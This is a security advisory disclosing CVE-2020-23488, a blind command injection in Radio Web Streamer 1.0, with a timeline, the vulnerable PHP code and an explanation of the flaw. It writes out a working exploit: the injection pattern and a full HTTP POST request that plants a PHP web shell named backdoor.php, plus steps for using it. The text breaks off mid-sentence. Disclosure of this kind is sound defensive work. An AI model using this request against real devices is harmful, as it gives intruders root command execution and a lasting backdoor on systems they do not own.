L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection
Title | L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection |
Discovery date | 29/05/2020 |
Release date | 25/02/2021 |
Credits | Francesco Marano |
Affected products | Radio Web Streamer, version 1.0 |
Class | Parameter Injection, Command Injection, Remote Command Execution |
Disclosure timeline
29/05/2020 | Request for CVE ID |
27/06/2020 | Additional info sent to mitre |
25/02/2021 | CVE-2020-23488 released |
Vulnerability details
Blind Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows an authenticated attacker to execute arbitrary command on the target system via specially crafted HTTP POST request. No output will be given on the attacker side.
The /api/volumeAudioHandler/setVolume.php
set audio volume using the following excerpt of PHP code:
$data = json_decode(file_get_contents("php://input"),1);
$vol = $data['data'];
$command="sudo -u root /usr/bin/amixer set PCM ".$vol."%";
exec( $command,$output,$retval);
$response["res"]=false;
$response["msg"]="Operazione fallita. Riprovare";
if ($retval==0){
$response["res"]=true;
$response["msg"]="Operazione avvenuta con successo";
}
echo json_encode($response);
As you can see, the $vol
parameter comes unsanitized from user input and it is used in a call to exec()
. Based on the command return code the output is "Operazione avvenuta con successo" if zero, "Operazione fallita. Riprovare"
otherwise.
Since the user input is not escaped, it is possible for an attacker to concatenate OS commands by using a payload like 100%; <command> #
. This will result in the execution of the following command:
sudo -u root /usr/bin/amixer set PCM 100%; <command> #%
The audio volume is correctly set to 100%, then
Since the attacker cannot see the output, but the return code, this vulnerability could be used to blindly write a web shell on the target machine to run commands with command output too.
A malicious HTTP POST request to create a web shell is:
POST /api/volumeAudioHandler/setVolume.php HTTP/1.1
Host: <target>
Referer: http://<target>/(homeRouter:streamConfigurator)
Content-Type: application/json; charset=utf-8
Authorization: Bearer *REDACTED*
Content-Length: 74
{"data":"100%; echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/backdoor.php #"}
If the response page contains the "Operazione avvenuta con successo" string the attacker can run arbitrary commands on the target machine with output by just sending HTTP GET requests from a browser visiting the following link:
http:///backdoor.php?c=
where